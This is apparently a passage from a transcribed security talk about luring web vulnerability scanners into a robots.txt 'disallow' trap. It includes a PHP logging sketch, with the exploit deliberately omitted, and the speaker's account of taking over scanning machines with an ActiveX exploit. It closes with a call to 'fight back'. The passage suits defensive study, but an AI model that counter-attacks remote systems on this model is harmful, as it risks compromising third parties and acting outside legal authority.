don't go to /zeus. Because if you do, you're gonna get owned. Well, a web vulnerability scanner is gonna ignore that. It's gonna see a disallow and it's gonna go there on purpose. And in that case, it would be owned.
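The bait itself can be as simple as the sketch below, with invented paths and log locations; the actual exploit-serving piece (Zeus, a Metasploit browser module, whatever you choose) is deliberately left out.

```php
<?php
// Illustrative "disallow as bait" handler.
$path = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);

if ($path === '/robots.txt') {
    // Well-behaved crawlers honor this; many scanners treat it as a to-do list.
    header('Content-Type: text/plain');
    echo "User-agent: *\nDisallow: /zeus/\n";
    exit;
}

if (strpos($path, '/zeus/') === 0) {
    // Anything that shows up here ignored the disallow on purpose: log it.
    file_put_contents(
        '/var/log/trap.log',
        date('c') . ' ' . $_SERVER['REMOTE_ADDR'] . ' ' . $path . "\n",
        FILE_APPEND
    );
    // This is where the scanner's embedded browser would be handed something nasty.
    echo '<html><body>Loading...</body></html>';
    exit;
}
```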
36:21
Interesting side note: I've tried a number of vulnerabilities. The ANI animated cursor vulnerability was the first thing I tried to pop the scanner with, and it didn't work. So one thing to note is that a lot of these scanners aren't executing the graphical part. So maybe some of the image-based attacks we're seeing, like the new SVG-based attacks or OpenGL attacks on web browsers.
36:41
These are graphics-based, and if you're running a browser headless within a scanner, it's not gonna be executing that complexity, so that's not really an avenue of attack. So maybe it has a smaller attack surface than your average web browser, but it's still huge. Like in this attack right here, we're using an ActiveX exploit. And come on, ActiveX has been a festering wound
37:01
in Internet Explorer since the beginning. And it is a valid avenue of attack against some of these web browsers that rely upon IE. Yeah, so there you go. We took over some of these boxes as they were attempting to scan us. Can you switch me back?
37:22
So you definitely don't wanna put this in a place that's gonna be blatantly obvious and publicly accessible, because that creates obvious legal problems. And as we talked about before, there's some legal ramifications to this
37:41
and I don't necessarily wanna undercut that, right? There's some case evidence that says this might actually be a valid approach under particular circumstances. In particular, US versus Heckenkamp, where the network administrator took over the box of a person who was in their mail server, saying this was an emergency, I had to respond to this, this was the best course of action.
38:01
They used the information to get attribution to identify that this was the gentleman who had broken into the machine. And that evidence was applicable in court and the court accepted it and he went to jail. Because he signed a EULA that said, I'm not gonna do that. And within the course of action, the network administrator is tasked with protecting his systems in the best way that he possibly can and the best way
38:21
he could possibly do it, in this case, was to take it over. That doesn't mean you get free rights to sit around and leave vulnerable browser stuff inside of it so you can hit anybody, because accidental attacks probably would be bad too. But if you put something like this into a web server that's hosted on your mail server or on a print server or something that people really ought not to be in
38:41
that's not public, that maybe is an internal process, now you have a better case you might be able to make. But again, consult your lawyer, right? So kind of as a recap: you need to stop acting like security is a broken egg that you can put Band-Aids over. You can't think of it this way. This is not a tenable position, right?
39:01
You need to start thinking like, I'm gonna kick your ass, right? Like, you need to think like this guy, because I'm not a rooster, but I'm actually a little afraid of him too. This isn't somebody you wanna mess with. This is somebody who looks like, if you start playing games with me, I'm gonna take you down. And that's how we should be treating security going forward: stop thinking purely in terms of vulnerabilities
39:21
and think, how can we shut you down? How can we take that back and how can we regain our pride, right? And that means we should fight back, right? That's what we need to do. So that's it for us. Any questions?